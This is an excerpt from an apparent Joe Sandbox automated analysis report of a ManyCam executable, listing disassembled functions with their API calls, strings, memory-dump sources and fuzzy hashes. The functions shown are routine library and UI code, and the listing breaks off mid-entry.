??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(00474884,0057CBF8,?,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000), ref: 00474CF5

Strings

map/set<T> too long, xrefs: 00474CBC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
Instruction ID: 902e9eb1271cb93d2a72db74486b01d1d5c84e1b516abcfe74867b495f5f0d12
Opcode Fuzzy Hash: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
Instruction Fuzzy Hash: 1ED1FB70A002099FCB04EFA5D891EEF7776AF89318B20855EF4159F295CB38AC51CBA5

Function 0048CF10 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF54
std::bad_exception::bad_exception.LIBCMTD ref: 0048CF68
_CxxThrowException.MSVCR80(0048A514,0057CBF8), ref: 0048CF76
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A514,0057CBF8,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF85

Strings

map/set<T> too long, xrefs: 0048CF4C

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
Instruction ID: 50f8718e498666fa4da98437a76d4638b1e2a723603710fac9882f3192207998
Opcode Fuzzy Hash: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
Instruction Fuzzy Hash: 1BD1AA70A002459FCB04FFA5D8D1EAF77B6BF89304B10495EF511AB396CA39A901CBE5

Function 00BCC890 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00BD318D,?,?,00BCD370,8BFFFEFC,50242444), ref: 00BCC89F
GlobalSize.KERNEL32(00BD318D), ref: 00BCC8AB
GlobalAlloc.KERNEL32(00000000,00000008), ref: 00BCC8BE
GlobalFree.KERNEL32(00BD318D), ref: 00BCC8DF

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Global$Alloc$FreeSize
String ID:
API String ID: 716937079-0
Opcode ID: 54969a0e1d14d3d333b47b246dd439038ee2aba5196c820f848c5c8995732aee
Instruction ID: 508985e4daf172367521c093ef46e01339b591d933759279ab7a956d5ac67ad6
Opcode Fuzzy Hash: 54969a0e1d14d3d333b47b246dd439038ee2aba5196c820f848c5c8995732aee
Instruction Fuzzy Hash: 8001B1727052196F5B246B69BCA9A7BFBDEFB98661744402EF94AC3310DEA19D00C390

Function 00402BB0 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

cvCreateImage.CXCORE099(?,?,00000008,00000001,?,?,00403181,?,?), ref: 00402BC0
cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,00000000,?,0040120F), ref: 00402BD4
cvCreateImage.CXCORE099(?,?,00000020,00000003,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BE9
cvReleaseImage.CXCORE099(?,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BFE
cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C10
cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C22

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image$CreateRelease
String ID:
API String ID: 3874174198-0
Opcode ID: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
Instruction ID: 6a9ac0958563a1589a8d938dd82cbe29a94ad790e47f913414e9d99cb75ce162
Opcode Fuzzy Hash: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
Instruction Fuzzy Hash: F901F9F590130176F630AB259D4EF4B76DCFF91701F04483AF55AA12C1F6B4E184C221

Function 00BB9810 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

Unknown filter heuristic method, xrefs: 00BB981D

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID: Unknown filter heuristic method
API String ID: 0-3224722364
Opcode ID: 9f082e904c75eed330b1fd2711d1ca66a41d596ac3e5d2f7b057867ed122ec3f
Instruction ID: cbec6d1b4f738989f28ac096f9cef2459f5065c9a46e195794b04367f0213dbe
Opcode Fuzzy Hash: 9f082e904c75eed330b1fd2711d1ca66a41d596ac3e5d2f7b057867ed122ec3f
Instruction Fuzzy Hash: CD51B430600B0687D720AF65DD89BE7B7E4FF56344F1049ADE5E98B222EBB1E845C742

Function 00434B70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 00447FF0: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00448006

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00434C17

Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A

memset.MSVCR80 ref: 00434C2B

Part of subcall function 00447E60: SendMessageW.USER32(?,00001132,00000000,yLC), ref: 00447E78

Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00434CEC

Part of subcall function 004DAF40: _DebugHeapAllocator.LIBCPMTD ref: 004DAF57

memset.MSVCR80 ref: 00434D1D

Strings

pzC, xrefs: 00434BF8

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapMessageSendmemset$Base::Concurrency::details::Concurrency::task_options::get_schedulerPolicyScheduler
String ID: pzC
API String ID: 1527497025-2444570644
Opcode ID: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
Instruction ID: ed1ee3073941a6660e753338659c4a22794240fa1e9d27d03445b3c6d8f704d4
Opcode Fuzzy Hash: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
Instruction Fuzzy Hash: 9C610CB1D01118DBDB14DFA5D891BEEBBB5FF48304F2041AEE10A67281DB386A45CF99

Function 00B92880 Relevance: 8.9, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(00000010,20BE36BE,?,?,?,?,00BDC6CD,000000FF), ref: 00B928A7
??2@YAPAXI@Z.MSVCR80(00000010,?,?,?,?,?,?,?,000000FF), ref: 00B928D5
??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,000000FF), ref: 00B92906
??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92937
??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92968
??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92999
??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B929CA

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 9b057b9e533050bb77c67dab2cfc4816063fa117c6fa73d2160d4f68546c6d73
Instruction ID: 7e25b8255ef59f6a2e2261fa52ca77cd6930c1a7a29112e5add75e85c8eb061e
Opcode Fuzzy Hash: 9b057b9e533050bb77c67dab2cfc4816063fa117c6fa73d2160d4f68546c6d73
Instruction Fuzzy Hash: DA415EB1A48301AFDB51EF79889672BBAD4AF84300F144CBEE499C7381EB74D4448F92

Function 00408360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474

Strings

<A>, xrefs: 0040840C
</A>, xrefs: 0040845C

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: </A>$<A>
API String ID: 1657112622-2122467442
Opcode ID: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
Instruction ID: 8d4014fe370238e856f28d0c67f96b0aed6e5c53389ece421d0f182d8b12796b
Opcode Fuzzy Hash: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
Instruction Fuzzy Hash: CB5121B4A0421ADFDB04CF88C990BAEB7B2FF84304F108159E915AB3D0DB75A946CF95

Function 00BA11D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00BA2FC0: malloc.MSVCR80 ref: 00BA2FC5

getenv.MSVCR80 ref: 00BA1296
sscanf.MSVCR80 ref: 00BA12B8

Strings

JPEGMEM, xrefs: 00BA128E
x, xrefs: 00BA12B3
%ld%c, xrefs: 00BA12AD

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: getenvmallocsscanf
String ID: %ld%c$JPEGMEM$x
API String ID: 677315340-3402169052
Opcode ID: 495c451a687e2d49d351bc00779b056c9d085188ce9cacd4a5c773e25dfe07ee
Instruction ID: 61a1f59de2976d145acded7f64d4f60de8106f02b6ca44f724eb2250f1f57a0a
Opcode Fuzzy Hash: 495c451a687e2d49d351bc00779b056c9d085188ce9cacd4a5c773e25dfe07ee
Instruction Fuzzy Hash: 094153B54087019FD720CF1DC884956FBF4FF82348B108AAEE09A8B661E771E919CF91

Function 0041C830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041C8AC

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041C8EA
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,0041C80E,00000049,0053F620,data\images\maindlg\,00000049,?,00000000,7EC02BB4,?,0041C80E,0000000C,00000049), ref: 0041C90D

Strings

.png, xrefs: 0041C8E2
data\images\maindlg\, xrefs: 0041C8A4

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$data\images\maindlg\
API String ID: 1315443971-2402009575
Opcode ID: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
Instruction ID: 95f2c906bb04f7db6848c29b7cfe536fa7cadaced1f5336b0e2a281727f52370
Opcode Fuzzy Hash: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
Instruction Fuzzy Hash: AD312DB1D05248EBCB04EFA5D986BDDBBB4FF18714F10452EE01577291D7746A08CBA8

Function 00BBB6B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BBB703
fprintf.MSVCR80 ref: 00BBB721
fprintf.MSVCR80 ref: 00BBB73E

Strings

libpng warning no. %s: %s, xrefs: 00BBB6FD
libpng warning: %s, xrefs: 00BBB71B, 00BBB738

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf
String ID: libpng warning no. %s: %s$libpng warning: %s
API String ID: 383729395-566911401
Opcode ID: 65b62045444eb78d5d87a65db8437c79585de537338a750968a56d3bcfbde8c8
Instruction ID: e0ab4292319692668b67a7dd27caced310a29b2d6add869bdde559447d9a2613
Opcode Fuzzy Hash: 65b62045444eb78d5d87a65db8437c79585de537338a750968a56d3bcfbde8c8
Instruction Fuzzy Hash: 55016F7150018117D3105B2CDC699BABFE5DFC1308F8844C9E4C6A77A3E6B59859C251

Function 00B95E90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000405,00000001,?), ref: 00B95ED7
cvError.CXCORE099(000000E5,cvSetTrackbarPos,NULL trackbar or window name,.\window_w32.cpp,00000598), ref: 00B95EFF

Strings

.\window_w32.cpp, xrefs: 00B95EEE
NULL trackbar or window name, xrefs: 00B95EF3
cvSetTrackbarPos, xrefs: 00B95EF8

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorMessageSend
String ID: .\window_w32.cpp$NULL trackbar or window name$cvSetTrackbarPos
API String ID: 1924224178-4125994439
Opcode ID: cc48e50baa1b15bb6e6a0d656f6a5977fe27b3b1f24b502850425103ba423133
Instruction ID: 01105c9005d03b47ba9b790a42b0265292d4408bafe1803f4d551e62902e925e
Opcode Fuzzy Hash: cc48e50baa1b15bb6e6a0d656f6a5977fe27b3b1f24b502850425103ba423133
Instruction Fuzzy Hash: AEF0F933680F10178E32AA29AC02E6BA2D59BD0F30B0B05F9F558E7291FB21EC0147A1

Function 004AE0D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE0FD
std::bad_exception::bad_exception.LIBCMTD ref: 004AE111
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004AE11F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE12E

Strings

vector<T> too long, xrefs: 004AE0F5

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
Instruction ID: 992c7d1c538af7c9c0ce4edad66a1111de3b001cb72a08a5d5271ad12714ae45
Opcode Fuzzy Hash: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
Instruction Fuzzy Hash: CCF04FB1944648EBCB14DF94ED45FDDBB78FB14720F50426AF812A32D0DB756A08CB54

Function 004307E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?,7EC02BB4), ref: 0043080D
std::bad_exception::bad_exception.LIBCMTD ref: 00430821
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0043082F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?), ref: 0043083E

Strings

vector<T> too long, xrefs: 00430805

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
Instruction ID: 84ce0209dc11d6b23fc1989ca18a4f5fc0ac43ec5a2d3810fda43137453e27bd
Opcode Fuzzy Hash: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
Instruction Fuzzy Hash: FCF0A9B1944248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 004E27F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

